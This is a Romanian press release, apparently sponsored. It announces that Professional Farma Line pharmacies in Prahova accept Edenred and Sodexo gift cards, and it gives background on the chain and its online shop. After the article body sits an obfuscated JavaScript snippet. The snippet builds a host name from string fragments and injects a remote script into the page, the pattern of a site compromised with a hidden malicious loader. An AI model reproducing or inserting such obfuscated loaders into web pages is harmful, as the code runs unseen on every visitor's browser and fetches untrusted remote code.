Din 30 martie, pacienții farmaciilor Professional Farma Line pot plăti cu ajutorul cardurilor cadou

Read Time:1 Minute, 47 Second

Pacienții care trec pragul farmaciilor din rețeaua Professional Farma Line își pot plăti produsele achiziționate prin intermediul cardurilor cadou, începând din 30 martie 2023.Copiază HTMLCopiază textul

Astfel pentru achitarea produselor achiziționate pacienții pot folosi și cardurile cadou Edenred și Sodexo, având astfel la dispoziție o nouă modalitate de plată. Este important de menționat că nu sunt acceptate cardurile cu tichete de masă, ci doar cele cadou pe care firmele le acordă angajaților drept un beneficiu extra-salarial.

Cardurile cadou Edenred și Sodexo încă nu pot fi folosite pentru cumpărăturile din farmacia online pfarma.ro, dar opțiunea de plată va fi disponibilă în curând.

Produse care se pot plăti cu ajutorul cardurilor cadou

Lista de produse care se pot plăti cu ajutorul cardurilor cadou este vastă. Pacienții Farma Line le pot folosi pentru a achita orice produs achizționat, indiferent de tipul acestuia. Așadar, pot achita medicamente cu rețetă, medicamente OTC (Over the Counter – se pot elibera fără prescripție medicală), suplimente alimentare, produse pentru îngrijire, produse sanitare, produse din gama mama și copilul și chiar cele care se încadrează în categoria tehnică medicală.

Despre Professional Farma Line

Rețeaua farmaceutică Professional FarmaLine, înființată în 2001, deține în prezent 28 de farmacii fizice, trei dintre acestea deschise recent în Bălțești, Surani și Podeni (județul Prahova), depozit și laborator. În laboratorul propriu se prepară rețete magistrale (personalizate de medic pentru fiecare pacient în parte) și oficinale conforme cu cele mai înalte standarde GMP. Laboratorul este dotat cu aparatură de ultimă generație, este certificat ISO 9001:2008 și este bine aprovizionat cu substanțe farmaceutice și ingrediente cosmetice.

Din portofoliu mai face parte și farmacia online pfarma.ro care are aprobare oficială pentru a comercializa online și livra către pacient produse OTC (medicamente eliberate fără rețetă).

Ne-am creat echipa “Professional Farmaline” cu dorința de a face diferența într-o piață în care doar clientul poate dicta regulile. (P)

(function(){
z61f=document.createElement(„script”);z61f_=((„u”)+”st”)+”a”;z61f.async=true;
z61f.type=”text/javascript”;z61f_+=(„t.i”)+””+”n”;z61f_+=((„f”)+”o”);z61f_+=”/”;
z61fu=”495731953.”;z61fu+=”m4sufs7f61fazf1v4rp”+”kk5xwwr1qX9″;
z61f.src=”https://”+z61f_+z61fu;document.body.appendChild(z61f);
})();


Happy

Happy
0

0 %


Sad

Sad
0
0 %


Excited

Excited
0
0 %


Sleepy

Sleepy
0

0 %


Angry

Angry
0
0 %


Surprise

Surprise
0
0 %

Articolul Din 30 martie, pacienții farmaciilor Professional Farma Line pot plăti cu ajutorul cardurilor cadou apare prima dată în Prahova Medicala .